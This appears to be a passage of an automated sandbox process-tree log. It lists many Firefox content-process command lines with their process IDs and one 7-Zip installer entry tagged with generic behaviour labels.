C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.19.1766569725\114279965" -childID 16 -isForBrowser -prefsHandle 6328 -prefMapHandle 8708 -prefsLen 30379 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {600efa06-c4a8-4434-8a49-dc271c6fab47} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 1392 145d5459858 tab
3⤵
PID:1724

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.20.1478325812\743835284" -childID 17 -isForBrowser -prefsHandle 8768 -prefMapHandle 8436 -prefsLen 30379 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9e8edab7-4910-459e-a737-3611ef946402} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 8400 145d8a51a58 tab
3⤵
PID:4304

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.21.78059000\1693757818" -childID 18 -isForBrowser -prefsHandle 6320 -prefMapHandle 8856 -prefsLen 30379 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2b5f4142-453f-45a0-8aa5-ca5673d0c83b} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 2696 145d870fb58 tab
3⤵
PID:3188

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.22.911904228\1396810948" -childID 19 -isForBrowser -prefsHandle 8772 -prefMapHandle 9136 -prefsLen 30379 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1b7c4a98-49ff-4084-b082-b0ac407fcf4a} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 8860 145d545a758 tab
3⤵
PID:3680

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.23.1416349563\1233069232" -childID 20 -isForBrowser -prefsHandle 4468 -prefMapHandle 8880 -prefsLen 30388 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0ba9b71c-bb68-4d89-b7f9-bb0f6182ceea} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 5860 145d8a53558 tab
3⤵
PID:5484

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.24.359548651\1142012918" -childID 21 -isForBrowser -prefsHandle 6304 -prefMapHandle 8704 -prefsLen 30388 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7119d6e5-dcc7-42ea-9b3b-10f8f4daf1f7} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 6044 145c3963858 tab
3⤵
PID:3748

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.25.1670917016\1519409474" -childID 22 -isForBrowser -prefsHandle 8444 -prefMapHandle 6332 -prefsLen 30388 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5fd0dd4a-7481-4130-a344-00b989b873da} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 8456 145c396d658 tab
3⤵
PID:1352

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.26.29749048\1116543602" -childID 23 -isForBrowser -prefsHandle 2776 -prefMapHandle 6352 -prefsLen 30388 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {da1cc8ae-f781-404b-8300-d1b01e5afe3b} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 8444 145da5c9258 tab
3⤵
PID:5932

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.28.581181304\1363952899" -childID 25 -isForBrowser -prefsHandle 8252 -prefMapHandle 8248 -prefsLen 30388 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e7a4b070-452a-4f03-8ce3-f06bbbd3c73f} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 6252 145dd5b5658 tab
3⤵
PID:5476

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.27.1538333113\1036194125" -childID 24 -isForBrowser -prefsHandle 8456 -prefMapHandle 7948 -prefsLen 30388 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5517978d-190e-4546-800f-3d8db0b0c29f} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 8444 145dd5b3e58 tab
3⤵
PID:5408

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.30.136535994\1158641565" -childID 27 -isForBrowser -prefsHandle 8796 -prefMapHandle 7672 -prefsLen 30388 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {738df93e-0328-4ef9-916f-ab35d3b35e22} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 7572 145dde7e558 tab
3⤵
PID:5836

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.29.17753530\1652882746" -childID 26 -isForBrowser -prefsHandle 7612 -prefMapHandle 9124 -prefsLen 30388 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3512dedc-a6cb-466a-a721-761e025fd6d4} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 8300 145da249b58 tab
3⤵
PID:5856

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.32.389888889\744976184" -childID 29 -isForBrowser -prefsHandle 7796 -prefMapHandle 7792 -prefsLen 30388 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dfb8959a-7861-4af3-8083-4be40029ab33} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 7960 145d62b0b58 tab
3⤵
PID:4672

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.31.666946058\1262845818" -childID 28 -isForBrowser -prefsHandle 4352 -prefMapHandle 8856 -prefsLen 30388 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ad6862ae-3e7b-4608-b572-804c5e86762b} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 10032 145d8711058 tab
3⤵
PID:5948

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.34.480410874\463918578" -childID 31 -isForBrowser -prefsHandle 9320 -prefMapHandle 5220 -prefsLen 30388 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {87e231ea-fea7-4a0a-a02a-c22f650a0c21} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 5332 145da0deb58 tab
3⤵
PID:4888

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.35.2043865293\1917620332" -childID 32 -isForBrowser -prefsHandle 1392 -prefMapHandle 8380 -prefsLen 30388 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5836376f-ea7e-4675-bcdb-e5980617cb1b} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 5136 145da0e0658 tab
3⤵
PID:5512

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.33.67482065\2101658477" -childID 30 -isForBrowser -prefsHandle 5316 -prefMapHandle 10036 -prefsLen 30388 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bc5de5b5-cad9-4ae6-a0df-436fe6a9172f} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 7560 145da0e1858 tab
3⤵
PID:5420

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.36.1230265023\1292535278" -childID 33 -isForBrowser -prefsHandle 7356 -prefMapHandle 7676 -prefsLen 30388 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {453af9b5-5110-46ce-b1c3-8bdb6dccc217} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 8216 145dccea458 tab
3⤵
PID:5848

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.37.1269122624\792960072" -childID 34 -isForBrowser -prefsHandle 7788 -prefMapHandle 7800 -prefsLen 30388 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {eadb1d65-8787-42d9-b3e8-529756fa6b08} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 10016 145d685e558 tab
3⤵
PID:5644

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.38.1113090861\469243876" -childID 35 -isForBrowser -prefsHandle 8688 -prefMapHandle 8948 -prefsLen 30388 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aac53d46-3872-413e-a588-a8a6e0e44ab1} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 5500 145d8eba458 tab
3⤵
PID:3344

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.40.637418147\1222678812" -childID 37 -isForBrowser -prefsHandle 8456 -prefMapHandle 9892 -prefsLen 30388 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4c114f39-4551-459c-939e-a279c7a41c4f} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 6056 145d8ed6158 tab
3⤵
PID:5552

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.39.1569959799\1577718508" -childID 36 -isForBrowser -prefsHandle 6472 -prefMapHandle 4968 -prefsLen 30388 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {71976156-037c-43d4-a648-2c83a5a2c064} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 8524 145d8ebad58 tab
3⤵
PID:6132

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.41.751282939\1288127764" -childID 38 -isForBrowser -prefsHandle 5292 -prefMapHandle 8368 -prefsLen 30388 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7fa6df68-2796-45bd-aaa9-a3b9ad663b50} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 8240 145d685e258 tab
3⤵
PID:2816

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.42.529071560\1851064123" -childID 39 -isForBrowser -prefsHandle 7700 -prefMapHandle 7780 -prefsLen 30388 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b04031b4-341f-4304-ae34-4d5c9b0e0eae} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 8020 145d8b24e58 tab
3⤵
PID:6112

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.43.1766676047\387107276" -childID 40 -isForBrowser -prefsHandle 4952 -prefMapHandle 7356 -prefsLen 30428 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ce907fb9-ef78-4b6b-afe7-e89d28aa6c81} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 6448 145d3959558 tab
3⤵
PID:4900

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.44.425813970\381608419" -childID 41 -isForBrowser -prefsHandle 8040 -prefMapHandle 7660 -prefsLen 30428 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fc8d2999-77ff-443d-b5c2-bea174abec9f} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 6044 145d8b21e58 tab
3⤵
PID:1480

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.46.779848568\362731589" -childID 43 -isForBrowser -prefsHandle 3084 -prefMapHandle 7696 -prefsLen 30437 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a18a1e73-a512-48a3-aa91-24f5384be8d0} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 4756 145d54c1058 tab
3⤵
PID:5288

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.45.1513518913\127877452" -childID 42 -isForBrowser -prefsHandle 2676 -prefMapHandle 6004 -prefsLen 30437 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bddd8551-3310-4e86-b306-78fd99041838} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 5688 145d30b5e58 tab
3⤵
PID:6016

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.47.1029649018\86193389" -childID 44 -isForBrowser -prefsHandle 4968 -prefMapHandle 7948 -prefsLen 30437 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bd3a8034-0b31-42de-ac11-526473eb74cc} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 9636 145d5e48b58 tab
3⤵
PID:2940

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.48.1022641065\569694096" -childID 45 -isForBrowser -prefsHandle 7952 -prefMapHandle 7776 -prefsLen 30437 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c2705447-e804-4990-9c84-8e41da8883a6} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 6492 145d68adf58 tab
3⤵
PID:612

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.49.414570927\1417495577" -childID 46 -isForBrowser -prefsHandle 10016 -prefMapHandle 7384 -prefsLen 30437 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {163b0a44-cfa0-418a-a4f0-f3579e225a77} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 7408 145d87e4f58 tab
3⤵
PID:5024

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.51.1221173438\774721149" -childID 48 -isForBrowser -prefsHandle 7268 -prefMapHandle 7260 -prefsLen 30437 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {01012bfd-fbb9-4684-82bd-7e322d7f6023} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 7320 145dd5b5058 tab
3⤵
PID:3956

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.50.1348301932\386915588" -childID 47 -isForBrowser -prefsHandle 5216 -prefMapHandle 8376 -prefsLen 30437 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0841067-1660-4d57-a1db-bc4bf5b496a0} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 7540 145dd5b4458 tab
3⤵
PID:2148

C:\Users\Admin\Downloads\7z2201-x64.exe
"C:\Users\Admin\Downloads\7z2201-x64.exe"
3⤵
- Executes dropped EXE
- Registers COM server for autorun
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5984

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.52.462898278\1458427840" -childID 49 -isForBrowser -prefsHandle 7852 -prefMapHandle 8612 -prefsLen 30437 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b129c269-004b-4686-bea1-6a1366d7bcd5} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 7216 145d87e4f58 tab
3⤵
PID:6116

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.53.579803951\1761921154" -childID 50 -isForBrowser -prefsHandle 6956 -prefMapHandle 7524 -prefsLen 30437 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {05c18e22-7043-4f0b-b934-4e97fb0c118e} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 7292 145dde81558 tab
3⤵
PID:5552

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.54.75982368\325725877" -childID 51 -isForBrowser -prefsHandle 6824 -prefMapHandle 6820 -prefsLen 30437 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5af597a8-91dd-4b50-b5f6-821ee71c30b0} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 7332 145dde81858 tab
3⤵
PID:6092

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.55.746837032\1281750855" -childID 52 -isForBrowser -prefsHandle 6760 -prefMapHandle 8104 -prefsLen 30437 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c01eadd8-54a4-4238-b93b-e654892b821e} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 6796 145c395c758 tab
3⤵
PID:1552

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.56.1986363728\1193627529" -childID 53 -isForBrowser -prefsHandle 9368 -prefMapHandle 9384 -prefsLen 30437 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {26d7a6be-3343-42f8-bb2a-d4dd935167ea} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 9356 145c3969358 tab
3⤵
PID:4380

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.57.2118692273\1088399645" -childID 54 -isForBrowser -prefsHandle 7164 -prefMapHandle 7140 -prefsLen 30493 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b67002d5-87a1-4ac8-a239-67fbc469cf63} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 7192 145d7668858 tab
3⤵
PID:4980

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.58.1862490857\1099327727" -childID 55 -isForBrowser -prefsHandle 6632 -prefMapHandle 7868 -prefsLen 30493 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8024f044-f7b0-4e35-aaf6-c3e73afa33a2} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 6636 145d30b6458 tab
3⤵
PID:4612

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.59.2039351726\210078879" -childID 56 -isForBrowser -prefsHandle 6784 -prefMapHandle 6780 -prefsLen 30564 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3a4246f8-d8aa-444c-bd73-74961a9bc964} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 7564 145d62b3558 tab
3⤵
PID:4948

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.60.76340640\1890422004" -childID 57 -isForBrowser -prefsHandle 9520 -prefMapHandle 9532 -prefsLen 30564 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {32f05079-3c2b-4a80-b4e9-55a7727d5c6a} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 4468 145c396a858 tab
3⤵
PID:5288

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.62.420311301\1314444923" -childID 59 -isForBrowser -prefsHandle 6916 -prefMapHandle 6904 -prefsLen 30564 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d3c1643d-c128-408c-82ee-53b68cea67da} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 6896 145c395fe58 tab
3⤵
PID:3836

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.61.1537685381\1280586393" -childID 58 -isForBrowser -prefsHandle 9168 -prefMapHandle 7192 -prefsLen 30564 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9359d9ae-c511-427f-9a63-66acdf551778} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 6728 145d8cae858 tab
3⤵
PID:5460

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.63.1883868318\1016630019" -childID 60 -isForBrowser -prefsHandle 8412 -prefMapHandle 5468 -prefsLen 30564 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {902147b0-8251-4078-943b-8773f7547d33} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 7528 145d8eb9258 tab
3⤵
PID:5520

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.64.1563245306\447714305" -childID 61 -isForBrowser -prefsHandle 7592 -prefMapHandle 8244 -prefsLen 30564 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5a13877a-74d7-4bf8-9213-4601ac932c61} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 8416 145dde87958 tab
3⤵
PID:4576

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.65.576712474\2096100271" -childID 62 -isForBrowser -prefsHandle 6736 -prefMapHandle 9840 -prefsLen 30564 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1aa565f5-ec7a-4202-a3df-f5f99f4acb19} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 10020 145dd5b3558 tab
3⤵
PID:5068

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.66.1460944184\1027549416" -childID 63 -isForBrowser -prefsHandle 8160 -prefMapHandle 6288 -prefsLen 30564 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4c9e9baf-2e53-4367-a52c-7a8b990bfe74} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 6356 145d8e53f58 tab
3⤵
PID:5464

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.67.1781897313\2015298735" -childID 64 -isForBrowser -prefsHandle 8932 -prefMapHandle 6220 -prefsLen 30564 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9aac60a9-89f3-4e1e-98c7-ada55f5cefc4} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 7576 145dbce4f58 tab
3⤵
PID:3980

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.69.513788608\567086390" -childID 66 -isForBrowser -prefsHandle 5088 -prefMapHandle 5100 -prefsLen 30564 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bb587b65-566e-4787-a50f-fb677731882e} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 5060 145dd3e9358 tab
3⤵
PID:6092

